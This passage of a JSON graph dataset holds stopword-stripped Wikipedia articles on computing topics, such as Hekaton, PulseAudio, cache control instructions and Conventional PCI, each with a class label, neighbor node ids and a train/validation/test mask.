      9245,
      10654,
      3233,
      9249,
      3876,
      11559,
      9128,
      4777,
      2603,
      5165,
      5677,
      3631,
      432,
      6062,
      8369,
      8115,
      692,
      11442,
      6075,
      576,
      1347,
      1348,
      8644,
      4550,
      8771,
      11076,
      10570,
      8524,
      5709,
      1742,
      7629,
      850,
      4564,
      4822,
      9943,
      6233,
      9434,
      10841,
      479,
      5729,
      2658,
      10470,
      5736,
      8554,
      9579,
      5612,
      11370,
      5743,
      8303,
      2673,
      8304,
      10480,
      5492,
      11123,
      9848,
      5754,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8619,
    "label": 1,
    "text": "Hekaton_(database):hekaton database hekaton also known sql server in-memory oltp in-memory database oltp workloads built microsoft sql server hekaton designed collaboration microsoft research released sql server 2014 traditional rdbms systems designed memory resources expensive optimized disk storage hekaton instead optimized working set stored entirely main memory still accessible via t-sql like normal tables fundamentally different dbcc pintable feature earlier sql server versions hekaton announced professional association sql server pass conference 2012",
    "neighbors": [
      2952,
      1964,
      4781,
      3219,
      2901,
      11030
    ],
    "mask": "None"
  },
  {
    "node_id": 8620,
    "label": 3,
    "text": "Sasa_(video_game):sasa video game sasa arcade video game released msx1 1984 later family computer titled 1985 video game involved obtaining capsules e sometimes suspended balloons main character could use bullets propel bullet count reaches 0 game ends player also lose bullets colliding enemy player player bullets",
    "neighbors": [
      5762,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8621,
    "label": 2,
    "text": "PulseAudio:pulseaudio pulseaudio network-capable sound server program distributed via freedesktop.org project runs mainly linux various bsd distributions freebsd openbsd macos well illumos distributions solaris operating system microsoft windows previously supported via mingw toolchain implementation gnu toolchain includes various tools gcc binutils windows port updated since 2011 however pulseaudio free open-source software licensed terms gnu lesser general public license licensed version 2.1 aforementioned license created 2004 name polypaudio renamed 2006 pulseaudio pulseaudio acts sound server background process accepting sound input one sources processes capture devices etc created background process redirects mentioned sound sources one sinks sound cards remote network pulseaudio servers processes one goals pulseaudio reroute sound streams including processes attempt directly access hardware like legacy oss applications pulseaudio achieves providing adapters applications using audio systems like arts esd typical installation scenario linux user configures alsa use virtual device provided pulseaudio thus applications using alsa output sound pulseaudio uses alsa access real sound card pulseaudio also provides native interface applications want support pulseaudio directly well legacy interface esd applications making suitable drop-in replacement esd oss applications pulseaudio provides codice_1 utility replaces device files codice_2 tricking applications believing exclusive control sound card reality output rerouted pulseaudio libcanberra abstract api desktop event sounds total replacement pulseaudio sample cache api libsydney total replacement pulseaudio streaming api plans made libsydney eventually become audio api used pulseaudio main pulseaudio features include pulseaudio first appeared regular users fedora linux starting version 8 adopted major linux distributions ubuntu debian mageia mandriva linux linux mint opensuse openwrt support pulseaudio gnome project also kde integrated plasma workspaces adding support phonon kde multimedia framework kmix integrated mixer application well speaker setup gui aid configuration multi-channel speakers pulseaudio also available illumos distribution openindiana enabled default mate environment various linux-based mobile devices including nokia n900 nokia n9 palm pre use pulseaudio tizen open-source mobile operating system project linux foundation governed technical steering group tsg composed intel samsung uses pulseaudio jack sound server provides real-time low latency i.e 5 milliseconds less audio performance since jack2 supports efficient load balancing utilizing symmetric multiprocessing load audio clients distributed among several processors jack preferred sound server professional audio applications ardour rezound linuxsampler multiple free audio-production distributions use default audio server possible jack pulseaudio coexist jack running pulseaudio automatically connect jack client allowing pulseaudio clients make record sound time jack clients pipewire audio video server aims support usecases currently handled pulseaudio jack jack pulseaudio sound systems managed multi-purpose integrated audio solutions solutions fully cover mixing sound streaming process still used jack pulseaudio send final audio stream sound card",
    "neighbors": [
      7552,
      11394,
      5380,
      4360,
      2955,
      1932,
      6413,
      6797,
      7181,
      7309,
      8848,
      9872,
      3859,
      7450,
      1822,
      543,
      10016,
      6049,
      6691,
      10149,
      4902,
      6694,
      4011,
      7983,
      1842,
      9908,
      823,
      11322,
      9660,
      2109,
      1728,
      2368,
      3649,
      7234,
      3015,
      3407,
      6991,
      593,
      4177,
      6993,
      5078,
      1112,
      3033,
      7384,
      2908,
      5343,
      11363,
      3300,
      5095,
      7913,
      4459,
      5356,
      2285,
      8685,
      9964,
      6257,
      499,
      2804,
      3189,
      3828,
      6389,
      8438,
      8700,
      2045,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 8622,
    "label": 8,
    "text": "Lotus_Foundations:lotus foundations lotus foundations bundled small-business server solutions package ibm package includes lotus domino directory services file management firewall backup web hosting various productivity tools product release direct result ibm acquisition net integration technologies integrated ibm lotus division original pre-acquisition product based net integrator mark 1 server appliance nitix autonomic linux server os lotus foundations introduced market hardware appliance late 2008 software-only appliance also made available 2010 lotus foundations hardware appliance discontinued software-only appliance followed suit february 2011 june 2011 however lotus foundations software appliance reinstated sale ibm sell directly anymore distributing selected business partners instead ibm lotus foundations products withdrawn marketing march 14 2013 longer available purchase support ibm lotus foundations products withdrawn september 30 2014 lotus domino ibm server product provides enterprise-grade e-mail collaboration capabilities custom application platform used application server lotus notes applications and/or web server also built-in database system nsf format lotus foundations firewall gui-based designed ease use features auto-configuration firewall settings firewall allows incoming ftp active passive mode http https smtp allowing outgoing dns ftp http https telnet well imap pop3 smtp mail protocols",
    "neighbors": [
      8416,
      4355,
      7364,
      8998,
      2887,
      11112,
      3323,
      9909,
      823,
      1467
    ],
    "mask": "Test"
  },
  {
    "node_id": 8623,
    "label": 8,
    "text": "AT_Internet:internet internet privately held company provides web analytics services consulting websites intranet mobile sites mobile applications provided services since 1995 company commonly known especially france former name flagship product internet application analytics suite used approximately 20,000 websites mobile applications worldwide company founded 1995 owner alain llorens web agency group focus shifted web analytics 1997 2011 internet recognized strong performer forrester wave™ web analytics q4 2011 report forrester research inc 2014 internet featured latest edition forrester report forrester wave™ web analytics q2 2014 named one 4 top providers web analytics software worldwide 2015 internet launched analytics suite integrated suite applications analytics reporting dashboard creation data visualization data mining app analytics data export 2016 company raised total €4 million funding r recruiting bpifrance cic coface european regional development fund nouvelle-aquitaine region raised €6.5 million 2013 internet provides tools enabling companies organizations measure analyse visitors arrive website mobile site mobile application well subsequent actions behaviors site information visualized dashboards reports shared across organization internet software integrated approximately 30 digital marketing applications company offers specialized consulting services on-site remote france data protection authority cnil recognized internet analytics suite full compliance french cookie regulations audience measurement application granted exemption cnil obtaining cookie consent analytics suite certified independent measurement organizations worldwide including uk abc kia-index tüv saarland ojd espana france acpm according company software complies requirements european commission general data protection regulation data processed europe stored proprietary servers france",
    "neighbors": [
      6576,
      9901,
      7965,
      1943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8624,
    "label": 3,
    "text": "Cache_control_instruction:cache control instruction computing cache control instruction hint embedded instruction stream processor intended improve performance hardware caches using foreknowledge memory access pattern supplied programmer compiler may reduce cache pollution reduce bandwidth requirement bypass latencies providing better control working set cache control instructions affect semantics program although several instructions variants supported several processor instruction set architectures arm mips powerpc x86 also termed data cache block touch effect request loading cache line associated given address performed codice_1 instruction x86 instruction set variants bypass higher levels cache hierarchy useful 'streaming context data traversed rather held working set prefetch occur sufficiently far ahead time mitigate latency memory access example loop traversing memory linearly gnu compiler collection intrinsic function codice_2 used invoke programming languages c c++ variant prefetch instruction cache hint used prepare cache lines overwriting contents completely example cpu need n't load anything main memory semantic effect equivalent aligned memset cache-line sized block zero operation effectively free hint used discard cache lines without committing contents main memory care needed since incorrect results possible unlike cache hints semantics program significantly modified used conjunction codice_3 managing temporary data saves unneeded main memory bandwidth cache pollution hint requests immediate eviction cache line making way future allocations used known data longer part working set processors support variant load–store instructions also imply cache hints example codice_4 powerpc instruction set suggests data used i.e. cache line question may pushed head eviction queue whilst keeping use still directly needed recent times cache control instructions become less popular increasingly advanced application processor designs intel arm devote transistors accelerating code written traditional languages e.g. performing automatic prefetch hardware detect linear access patterns fly however techniques may remain valid throughput-oriented processors different throughput vs latency tradeoff may prefer devote area execution units processors support scratchpad memory temporaries may put direct memory access dma transfer data main memory needed approach used cell processor embedded systems allow greater control memory traffic locality working set managed explicit transfers eliminates need expensive cache coherency manycore machine disadvantage requires significantly different programming techniques use hard adapt programs written traditional languages c c++ present programmer uniform view large address space illusion simulated caches traditional microprocessor easily run legacy code may accelerated cache control instructions whilst scratchpad based machine requires dedicated coding ground even function cache control instructions specific certain cache line size practice may vary generations processors architectural family caches may also help coalescing reads writes less predictable access patterns e.g. texture mapping whilst scratchpad dma requires reworking algorithms predictable 'linear traversals scratchpads generally harder use traditional programming models although dataflow models tensorflow might suitable vector processors example modern graphics processing unit gpus xeon phi use massive parallelism achieve high throughput whilst working around memory latency reducing need prefetching many read operations issued parallel subsequent invocations compute kernel calculations may put hold awaiting future data whilst execution units devoted working data past requests data already turned easier programmers leverage conjunction appropriate programming models compute kernels harder apply general purpose programming disadvantage many copies temporary states may held local memory processing element awaiting data flight",
    "neighbors": [
      9095,
      7699,
      407,
      1952,
      10658,
      2339,
      9126,
      6311,
      4417,
      7234,
      5844,
      9300,
      5725,
      8680,
      9964,
      10734,
      499,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8625,
    "label": 3,
    "text": "Conventional_PCI:conventional pci conventional pci often shortened pci local computer bus attaching hardware devices computer pci abbreviation peripheral component interconnect part pci local bus standard pci bus supports functions found processor bus standardized format independent particular processor native bus devices connected pci bus appear bus master connected directly bus assigned addresses processor address space parallel bus synchronous single bus clock attached devices take either form integrated circuit fitted onto motherboard called planar device pci specification expansion card fits slot pci local bus first implemented ibm pc compatibles displaced combination several slow isa slots one fast vesa local bus slot bus configuration subsequently adopted computer types typical pci cards used pcs include network cards sound cards modems extra ports usb serial tv tuner cards disk controllers pci video cards replaced isa vesa cards growing bandwidth requirements outgrew capabilities pci preferred interface video cards became agp superset pci giving way pci express first version pci found retail desktop computers 32-bit bus using 33 mhz bus clock 5 v signalling although pci 1.0 standard provided 64-bit variant well one locating notch card version 2.0 pci standard introduced 3.3 v slots physically distinguished flipped physical connector prevent accidental insertion 5 v cards universal cards operate either voltage two notches version 2.1 pci standard introduced optional 66 mhz operation server-oriented variant pci called pci-x pci extended operated frequencies 133 mhz pci-x 1.0 533 mhz pci-x 2.0 internal connector laptop cards called mini pci introduced version 2.2 pci specification pci bus also adopted external laptop connector standard cardbus first pci specification developed intel subsequent development standard became responsibility pci special interest group pci-sig conventional pci pci-x sometimes called parallel pci order distinguish technologically recent successor pci express adopted serial lane-based architecture pci heyday desktop computer market approximately 1995–2005 pci pci-x become obsolete purposes however still common modern desktops purposes backwards compatibility low relative cost produce many kinds devices previously available pci expansion cards commonly integrated onto motherboards available usb pci express versions work pci began intel architecture development lab team intel engineers composed primarily adl engineers defined architecture developed proof concept chipset platform saturn partnering teams company desktop pc systems core logic product organizations pci immediately put use servers replacing mca eisa server expansion bus choice mainstream pcs pci slower replace vesa local bus vlb gain significant market penetration late 1994 second-generation pentium pcs 1996 vlb extinct manufacturers adopted pci even 486 computers eisa continued used alongside pci 2000 apple computer adopted pci professional power macintosh computers replacing nubus mid-1995 consumer performa product line replacing lc pds mid-1996 64-bit version plain pci remained rare practice though although used example post-imac g3 g4 power macintosh computers later revisions pci added new features performance improvements including 66 mhz 3.3 v standard 133 mhz pci-x adaptation pci signaling form factors pci-x 1.0b pci-x 2.0 backward compatible pci standards revisions used server hardware consumer pc hardware remained nearly 32 bit 33 mhz 5 volt pci-sig introduced serial pci express time renamed pci conventional pci since motherboard manufacturers included progressively fewer pci slots favor new standard many new motherboards provide pci slots late 2013 pci provides separate memory i/o port address spaces x86 processor family 64 32 bits respectively addresses address spaces assigned software third address space called pci configuration space uses fixed addressing scheme allows software determine amount memory i/o address space needed device device request six areas memory space i/o port space via configuration space registers typical system firmware operating system queries pci buses startup time via pci configuration space find devices present system resources memory space i/o space interrupt lines etc needs allocates resources tells device allocation pci configuration space also contains small amount device type information helps operating system choose device drivers least dialogue user system configuration devices may on-board rom containing executable code x86 pa-risc processors open firmware driver efi driver typically necessary devices used system startup device drivers loaded operating system addition pci latency timers mechanism pci bus-mastering devices share pci bus fairly fair case means devices use large portion available pci bus bandwidth devices able get needed work done note apply pci express devices required follow protocol interrupt lines shared pci bus includes four interrupt lines available device however wired parallel pci bus lines positions interrupt lines rotate slots appears one device inta line intb next intc one single-function devices use inta interrupt signaling device load spread fairly evenly across four available interrupt lines alleviates common problem sharing interrupts mapping pci interrupt lines onto system interrupt lines pci host bridge implementation-dependent platform-specific bios code meant know set interrupt line field device configuration space indicating irq connected pci interrupt lines level-triggered chosen edge-triggering order gain advantage servicing shared interrupt line robustness edge triggered interrupts easy miss later revisions pci specification add support message-signaled interrupts system device signals need service performing memory write rather asserting dedicated line alleviates problem scarcity interrupt lines even interrupt vectors still shared suffer sharing problems level-triggered interrupts also resolves routing problem memory write unpredictably modified device host finally message signaling in-band resolves synchronization problems occur posted writes out-of-band interrupt lines pci express physical interrupt lines uses message-signaled interrupts exclusively specifications represent common version pci used normal pcs pci specification also provides options 3.3 v signaling 64-bit bus width 66 mhz clocking commonly encountered outside pci-x support server motherboards pci bus arbiter performs bus arbitration among multiple masters pci bus number bus masters reside pci bus well requests bus one pair request grant signals dedicated bus master typical pci cards either one two key notches depending signaling voltage cards requiring 3.3 volts notch 56.21 mm card backplate requiring 5 volts notch 104.47 mm backplate allows cards fitted slots voltage support universal cards accepting either voltage key notches pci connector defined 62 contacts side edge connector two four replaced key notches card 60 58 contacts side side refers 'solder side side b refers 'component side card held connector pointing view side backplate right whereas view side b backplate left pinout b sides follows looking motherboard connector pins a1 b1 closest backplate 64-bit pci extends additional 32 contacts side provide ad 63:32 c/be 7:4 par64 parity signal number power ground pins lines connected slot parallel exceptions notes 32-bit pci cards function properly 64-bit pci-x slots bus clock rate limited clock frequency slowest card inherent limitation pci shared bus topology example pci 2.3 66-mhz peripheral installed pci-x bus capable 133 mhz entire bus backplane limited 66 mhz get around limitation many motherboards two pci/pci-x buses one bus intended use high-speed pci-x peripherals bus intended general-purpose peripherals many 64-bit pci-x cards designed work 32-bit mode inserted shorter 32-bit connectors loss performance example adaptec 29160 64-bit scsi interface card however 64-bit pci-x cards work standard 32-bit pci slots installing 64-bit pci-x card 32-bit slot leave 64-bit portion card edge connector connected overhanging requires motherboard components positioned mechanically obstruct overhanging portion card edge connector maximum width pci card 15.24 mm 0.6 inches two bracket heights specified known full-height low-profile bracket backplate part fastens card cage stabilize card also usually contains external connectors attaches window computer case connectors accessible outside backplate typically fixed case either 6-32 m3 screw separate hold-down bracket part case bracket height two different lengths specified total four lengths known full-length half-length full-height cards md1 md2 low-profile cards original full-height cards defined bracket height 120 mm 4.7 inches height full-height cards nominally 107 mm 4.2 inches height includes card edge connector two lengths defined full-height cards known full-length half-length original full-length full-height pci card also known full-size specified length 312 mm 12.283 inches height 107 mm 4.2 inches however modern pci cards half-length smaller see many modern pc cases accommodate length full-size card note length length printed circuit board include angled short leg metal bracket affect e.g packaging dimensions high power pci products active cooling systems extend past nominal dimensions likewise may take one slot space referred double-wide triple-wide cards accordingly half-length full-height card length 175.26 mm 6.9 inches height 107 mm 4.2 inches actual dimensions many cards described half-length full-height lower maximums still fit standard full-height pci slot long use properly located full-height bracket fact practical de facto standard majority modern pci cards fit inside envelope low-profile pci cards also known lppci half-height cards defined bracket reduced height 79.2 mm 3.118 inches low-profile specification assumes 3.3 volt pci slot retention screw also moved 1.35 mm closer fold bracket low profile card maximum height 64.41 mm 2.536 inches including edge connector smaller bracket fit standard desktop tower 3u rack-mount pc case fit many newer small form-factor sff desktop cases 2u rack-mount case cards may known names slim many manufacturers supply types bracket cards bracket typically attached card pair screws allowing installer easily change pci-sig defined two standard lengths low-profile cards known md1 md2 md1 defines shortest 32-bit pci card length 119.91 mm 4.721 inches maximum height 64.41 mm 2.536 inches md2 defines maximum length low profile pci card 167.64 mm 6.600 inches maximum height 64.41 mm 2.536 inches low profile pci card longer md1 length considered md2 card common low-profile card form-factor beside conventional pci many pci express cards also described md2 low-profile form-factor mini pci added pci version 2.2 use laptops uses 32-bit 33 mhz bus powered connections 3.3 v 5 v limited 100 support bus mastering dma standard size mini pci cards approximately quarter full-sized counterparts access card outside case unlike desktop pci cards brackets carrying connectors limits kinds functions mini pci card perform many mini pci devices developed wi-fi fast ethernet bluetooth modems often winmodems sound cards cryptographic accelerators scsi ide–ata sata controllers combination cards mini pci cards used regular pci-equipped hardware using mini pci-to-pci converters mini pci superseded much narrower pci express mini card mini pci cards 2 w maximum power consumption limits functionality implemented form factor also required support clkrun pci signal used start stop pci clock power management purposes three card form factors type type ii type iii cards card connector used type include type ii use 100-pin stacking connector type iii uses 124-pin edge connector i.e connector types ii differs type iii connector edge card like so-dimm additional 24 pins provide extra signals required route i/o back system connector audio ac-link lan phone-line interface type ii cards rj11 rj45 mounted connectors cards must located edge computer docking station rj11 rj45 ports mounted external access mini pci distinct 144-pin micro pci pc/104-plus pci-104 embedded form factors include stacking 120 pin pci connector typically consumer systems specify n × pci slots without specifying actual dimensions space available small-form-factor systems may sufficient allow even half-length pci cards fit despite limitation systems still useful many modern pci cards considerably smaller half-length pci bus traffic consists series pci bus transactions transaction consists address phase followed one data phases direction data phases may initiator target write transaction vice versa read transaction data phases must direction either party may pause halt data phases point one common example low-performance pci device support burst transactions always halts transaction first data phase pci device may initiate transaction first must request permission pci bus arbiter motherboard arbiter grants permission one requesting devices initiator begins address phase broadcasting 32-bit address plus 4-bit command code waits target respond devices examine address one responds cycles later 64-bit addressing done using two-stage address phase initiator broadcasts low 32 address bits accompanied special dual address cycle command code devices support 64-bit addressing simply respond command code next cycle initiator transmits high 32 address bits plus real command code transaction operates identically point ensure compatibility 32-bit pci devices forbidden use dual address cycle necessary i.e high-order address bits zero pci bus transfers 32 bits per data phase initiator transmits 4 active-low byte enable signals indicating 8-bit bytes considered significant particular write must affect enabled bytes target pci device little importance memory reads i/o reads might side effects pci standard explicitly allows data phase bytes enabled must behave no-op pci three address spaces memory i/o address configuration memory addresses 32 bits optionally 64 bits size support caching burst transactions i/o addresses compatibility intel x86 architecture i/o port address space although pci bus specification allows burst transactions address space devices support memory addresses i/o finally pci configuration space provides access 256 bytes special configuration registers per pci device pci slot gets configuration space address range registers used configure devices memory i/o address ranges respond transaction initiators computer first turned pci devices respond configuration space accesses computer bios scans devices assigns memory i/o address ranges address claimed device transaction initiator address phase time causing initiator abort operation case reads customary supply all-ones read data value 0xffffffff case pci devices therefore generally attempt avoid using all-ones value important status registers error easily detected software 16 possible 4-bit command codes 12 assigned exception unique dual address cycle least significant bit command code indicates whether following data phases read data sent target initiator write data sent initiator target pci targets must examine command code well address respond address phases specify unsupported command code commands refer cache lines depend pci configuration space cache line size register set properly may used done soon promulgation pci specification discovered lengthy transactions devices due slow acknowledgments long data bursts combination could cause buffer underrun overrun devices recommendations timing individual phases revision 2.0 made mandatory revision 2.1 additionally revision 2.1 initiators capable bursting two data phases must implement programmable latency timer timer starts counting clock cycles transaction starts initiator asserts frame timer expired arbiter removed gnt initiator must terminate transaction next legal opportunity usually next data phase memory write invalidate transactions must continue end cache line devices unable meet timing restrictions must use combination posted writes memory writes delayed transactions writes reads delayed transaction target records transaction including write data internally aborts asserts stop rather trdy first data phase initiator must retry exactly transaction later interim target internally performs transaction waits retried transaction retried transaction seen buffered result delivered device may target transactions completing one delayed transaction must remember transaction type address byte selects write data value complete correct transaction target limit number delayed transactions record internally simple targets may impose limit 1 force transactions retry without recording dealt current delayed transaction completed two initiators attempt transaction delayed transaction begun one may result delivered harmless target abandons delayed transaction retry succeeds delivering buffered result bus reset 2=32768 clock cycles approximately 1 ms elapse without seeing retry latter never happen normal operation prevents deadlock whole bus one initiator reset malfunctions pci standard permits multiple independent pci buses connected bus bridges forward operations one bus another required although pci tends use many bus bridges pci express systems use many pci express slot appears separate bus connected bridge others generally bus bridge sees transaction one bus must forwarded original transaction must wait forwarded transaction completes result ready one notable exception occurs case memory writes bridge may record write data internally room signal completion write forwarded write completed indeed begun sent yet arrived writes referred posted writes analogy postal mail message although offer great opportunity performance gains rules governing permissible somewhat intricate pci standard permits bus bridges convert multiple bus transactions one larger transaction certain situations improve efficiency pci bus pci bus transactions controlled five main control signals two driven initiator transaction frame irdy three driven target devsel trdy stop two additional arbitration signals req gnt used obtain permission initiate transaction active-low meaning active asserted state low voltage pull-up resistors motherboard ensure remain high inactive deasserted driven device pci bus depend resistors change signal level devices drive signals high one cycle ceasing drive signals pci bus signals sampled rising edge clock signals nominally change falling edge clock giving pci device approximately one half clock cycle decide respond signals observed rising edge one half clock cycle transmit response device pci bus requires every time device driving pci bus signal changes one turnaround cycle must elapse time one device stops driving signal device starts without might period devices driving signal would interfere bus operation combination turnaround cycle requirement drive control line high one cycle ceasing drive means main control lines must high minimum two cycles changing owners pci bus protocol designed rarely limitation special cases notably fast back-to-back transactions necessary insert additional delay meet requirement device pci bus capable acting bus master may initiate transaction device ensure one transaction initiated time master must first wait bus grant signal gnt arbiter located motherboard device separate request line req requests bus arbiter may park bus grant signal device current requests arbiter may remove gnt time device loses gnt may complete current transaction may start one asserting frame unless observes gnt asserted cycle begins arbiter may also provide gnt time including another master transaction transaction either frame irdy asserted deasserted bus idle device may initiate transaction time gnt asserted bus idle pci bus transaction begins address phase initiator seeing gnt bus idle drives target address onto ad 31:0 lines associated command e.g memory read i/o write c/be 3:0 lines pulls frame low device examines address command decides whether respond target asserting devsel device must respond asserting devsel within 3 cycles devices promise respond within 1 2 cycles said fast devsel medium devsel respectively actually time respond 2.5 cycles since pci devices must transmit signals half cycle early received three cycles later note device must latch address first cycle initiator required remove address command bus following cycle even receiving devsel response additional time available interpreting address command captured fifth cycle address phase earlier devices medium devsel faster catch-all subtractive decoding allowed address ranges commonly used isa bus bridge addresses within range 24 bits memory 16 bits i/o sixth cycle response initiator may abort transaction deasserting frame known master abort termination customary pci bus bridges return all-ones data 0xffffffff case pci devices therefore generally designed avoid using all-ones value important status registers error easily detected software rising edge clock 0 initiator observes frame irdy high gnt low drives address command asserts frame time rising edge clock 1 targets latch address begin decoding may respond devsel time clock 2 fast devsel 3 medium 4 slow subtractive decode devices seeing response clock 4 may respond clock 5 master see response clock 5 terminate transaction remove frame clock 6 trdy stop deasserted high address phase initiator may assert irdy soon ready transfer data could theoretically soon clock 2 allow 64-bit addressing master present address two consecutive cycles first sends low-order address bits special dual-cycle address command c/be 3:0 following cycle sends high-order address bits actual command dual-address cycles forbidden high-order address bits zero devices support 64-bit addressing simply respond dual cycle commands addresses pci configuration space access decoded specially low-order address lines specify offset desired pci configuration register high-order address lines ignored instead additional address signal idsel input must high device may assert devsel slot connects different high-order address line idsel pin selected using one-hot encoding upper address lines address phase specifically beginning cycle devsel goes low comes burst one data phases cases initiator drives active-low byte select signals c/be 3:0 lines data ad 31:0 may driven initiator case writes target case reads data phases c/be 3:0 lines interpreted active-low byte enables case write asserted signals indicate four bytes ad bus written addressed location case read indicate bytes initiator interested reads always legal ignore byte enable signals simply return 32 bits cacheable memory resources required always return 32 valid bits byte enables mainly useful i/o space accesses reads side effects data phase four c/be lines deasserted explicitly permitted pci standard must effect target advance address burst access progress data phase continues parties ready complete transfer continue next data phase initiator asserts irdy initiator ready longer needs wait target asserts trdy target ready whichever side providing data must drive ad bus asserting ready signal one participants asserts ready signal may become un-ready otherwise alter control signals end data phase data recipient must latch ad bus cycle sees irdy trdy asserted marks end current data phase indicates just-latched data word transferred maintain full burst speed data sender half clock cycle seeing irdy trdy asserted drive next word onto ad bus continues address cycle illustrated assuming single address cycle medium devsel target responds time clock 3 however time neither side ready transfer data clock 4 initiator ready target clock 5 ready data transfer takes place indicated vertical lines clock 6 target ready transfer initiator clock 7 initiator becomes ready data transferred clocks 8 9 sides remain ready transfer data data transferred maximum possible rate 32 bits per clock cycle case read clock 2 reserved turning around ad bus target permitted drive data bus even capable fast devsel target supports fast devsel could theory begin responding read cycle address presented cycle however reserved ad bus turnaround thus target may drive ad bus thus may assert trdy second cycle transaction note targets fast need special logic enforce condition either side may request burst end current data phase simple pci devices support multi-word bursts always request immediately even devices support bursts limit maximum length support end addressable memory initiator mark data phase final one transaction deasserting frame time asserts irdy cycle target asserts trdy final data transfer complete sides deassert respective rdy signals bus idle master may deassert frame asserting irdy may deassert frame waiting irdy asserted target assert trdy minor exception master abort termination target responds devsel obviously pointless wait trdy case however even case master must assert irdy least one cycle deasserting frame commonly master assert irdy receiving devsel must simply hold irdy asserted one cycle longer ensure bus turnaround timing rules obeyed frame line target requests initiator end burst asserting stop initiator end transaction deasserting frame next legal opportunity wishes transfer data continue separate transaction several ways target always least one cycle target-initiated disconnection allow master deassert frame two sub-cases take amount time one requires additional data phase initiator ends burst time target requests disconnection additional bus cycle memory space accesses words burst may accessed several orders unnecessary low-order address bits ad 1:0 used convey initiator requested order target support particular order must terminate burst first word orders depend cache line size configurable pci devices starting offset within cache line zero modes reduce order cache line toggle cache line wrap modes two forms critical-word-first cache line fetching toggle mode xors supplied address incrementing counter native order intel 486 pentium processors advantage necessary know cache line size implement pci version 2.1 obsoleted toggle mode added cache line wrap mode fetching proceeds linearly wrapping around end cache line one cache line completely fetched fetching jumps starting offset next cache line note pci devices support limited range typical cache line sizes cache line size programmed unexpected value force single-word access pci also supports burst access i/o configuration space linear mode supported rarely used may buggy devices may support properly force single-word access either highest-possible speed four-word write burst terminated master clock edge 1 initiator starts transaction driving address command asserting frame signals idle indicated ^^^ pulled high motherboard pull-up resistors might turnaround cycle cycle 2 target asserts devsel trdy initiator also ready data transfer occurs repeats three cycles last one clock edge 5 master deasserts frame indicating end clock edge 6 ad bus frame undriven turnaround cycle control lines driven high 1 cycle clock edge 7 another initiator start different transaction also turnaround cycle control lines equivalent read burst takes one cycle target must wait 1 cycle ad bus turn around may assert trdy high-speed burst terminated target extra cycle end clock edge 6 target indicates wants stop data initiator already holding irdy low fifth data phase clock edge 7 data transferred pci bus detects parity errors attempt correct retrying operations purely failure indication due need detect parity error happened pci bus actually detects cycles later data phase whichever device driving ad 31:0 lines computes even parity c/be 3:0 lines sends par line one cycle later access rules turnaround cycles ad bus apply par line one cycle later device listening ad bus checks received parity asserts perr parity error line one cycle generally generates processor interrupt processor search pci bus device detected error perr line used data phases target selected parity error detected address phase data phase special cycle devices observe assert serr system error line even bytes masked c/be lines use must still defined value value must used compute parity due need turnaround cycle different devices driving pci bus signals general necessary idle cycle pci bus transactions however circumstances permitted skip idle cycle going directly final cycle one transfer irdy asserted frame deasserted first cycle next frame asserted irdy deasserted initiator may perform back-to-back transactions additional timing constraints may come need turn around target control lines particularly devsel target deasserts devsel driving high cycle following final data phase case back-to-back transactions first cycle address phase second cycle address phase reserved devsel turnaround target different previous one must assert devsel third cycle medium devsel speed one case problem arise initiator knows somehow presumably addresses share sufficient high-order bits second transfer addressed target previous one case may perform back-to-back transactions pci targets must support also possible target keeps track requirements never fast devsel met trivially must wait medium devsel time unless targets capability indicate special bit pci configuration register targets bus initiators may use back-to-back transfers freely subtractive decoding bus bridge must know expect extra delay event back-to-back cycles order advertise back-to-back support starting revision 2.1 pci specification includes optional 64-bit support provided via extended connector provides 64-bit bus extensions ad 63:32 c/be 7:4 par64 number additional power ground pins 64-bit pci connector distinguished 32-bit connector additional 64-bit segment memory transactions 64-bit devices may use 64 bits double data transfer rate non-memory transactions including configuration i/o space accesses may use 64-bit extension 64-bit burst burst addressing works 32-bit transfer address incremented twice per data phase starting address must 64-bit aligned i.e ad2 must 0 data corresponding intervening addresses ad2 1 carried upper half ad bus initiate 64-bit transaction initiator drives starting address ad bus asserts req64 time frame selected target support 64-bit transfer transaction replies asserting ack64 time devsel note target may decide per-transaction basis whether allow 64-bit transfer req64 asserted address phase initiator also drives high 32 bits address copy bus command high half bus address requires 64 bits dual address cycle still required high half bus carries upper half address final command code address phase cycles allows 64-bit target see entire address begin responding earlier initiator sees devsel asserted without ack64 performs 32-bit data phases data would transferred upper half bus first data phase instead transferred second data phase typically initiator drives 64 bits data seeing devsel ack64 missing may cease driving upper half data bus req64 ack64 lines held asserted entire transaction save last data phase deasserted time frame devsel respectively par64 line operates like par line provides even parity ad 63:32 c/be 7:4 valid address phases req64 asserted par64 valid data phases req64 ack64 asserted pci originally included optional support write-back cache coherence required support cacheable memory targets would listen two pins cache bus sdone snoop done sbo snoop backoff rarely implemented practice deleted revision 2.2 pci specification pins re-used smbus access revision 2.3 cache would watch memory accesses without asserting devsel noticed access might cached would drive sdone low snoop done coherence-supporting target would avoid completing data phase asserting trdy observed sdone high case write data clean cache cache would invalidate copy would assert sdone soon established however cache contained dirty data cache would write back access could proceed would assert sbo raising sdone would signal active target assert stop rather trdy causing initiator disconnect retry operation later meantime cache would arbitrate bus write data back memory targets supporting cache coherency also required terminate bursts cross cache lines developing and/or troubleshooting pci bus examination hardware signals important logic analyzers bus analyzers tools collect analyze decode signals users view useful ways",
    "neighbors": [
      6659,
      5386,
      639,
      5520,
      1425,
      10130,
      9363,
      10516,
      6806,
      408,
      6296,
      2714,
      8090,
      10360,
      11417,
      799,
      2339,
      2723,
      10019,
      8487,
      4264,
      9641,
      6187,
      3886,
      7983,
      6268,
      7860,
      7863,
      9791,
      5312,
      2503,
      3272,
      8136,
      8394,
      2379,
      9799,
      4173,
      5457,
      10833,
      9686,
      4695,
      2523,
      1115,
      2525,
      5598,
      1121,
      10337,
      4581,
      9959,
      8552,
      11627,
      6510,
      7151,
      8944,
      6129,
      11631,
      499,
      3445,
      8439,
      5368,
      10363,
      1788,
      3071
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8626,
    "label": 8,
